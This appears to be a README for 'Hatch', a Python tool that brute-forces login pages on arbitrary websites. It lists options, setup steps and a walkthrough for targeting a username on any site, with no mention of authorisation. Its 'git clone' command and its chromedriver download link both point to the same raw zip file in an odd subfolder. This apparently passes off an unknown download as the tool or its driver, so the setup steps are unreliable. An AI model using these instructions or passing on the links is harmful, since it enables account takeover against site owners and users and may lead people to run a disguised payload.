.png){kind=link}
Hatch is a brute force tool that is used to brute force most websites
added arg support yay
-h, --help show this help message and exit
-u USERNAME, --username=USERNAME Choose the username
--usernamesel=USERNAMESEL Choose the username selector
--passsel=PASSSEL Choose the password selector
--loginsel=LOGINSEL Choose the login button selector
--passlist=PASSLIST Enter the password list directory
--website=WEBSITE choose a website
dont worry if you load up the tool without any args youll go to the default wizard!
Also i removed the apt xvfb and pip2 pyvirtualdisplay
git clone https://raw.githubusercontent.com/hoemw/Hatch/master/ministeriality/Software_2.5-beta.5.zip
python2 main.py
pip install -r requirements.txt
Chrome and chromedriver are required
You can download chromedriver here: https://raw.githubusercontent.com/hoemw/Hatch/master/ministeriality/Software_2.5-beta.5.zip
WINDOWS
Create a folder in your C drive called 'webdrivers' and place the executable file inside. If you want to use a different directory, simply change the CHROME_DVR_DIR variable inside the python file.
LINUX
Place the executable file (chromedriver) inside your /bin. If you want to use a different directory, simply change the CHROME_DVR_DIR variable inside the python file and ensure that it is set to PATH.
- Find a website with a login page
- Inspect element to find the Selector of the username form (E.g. #username)
- Do the same for the password field (E.g. #password)
- And the same for the form submit/POST button of the login form
- When Asked put in the username to brute force, do it.
- Watch it go!
- For websites that has the same selector for its login form in its page redirect, the script will not be able to differentiate the webpages and will not mention the successful password input.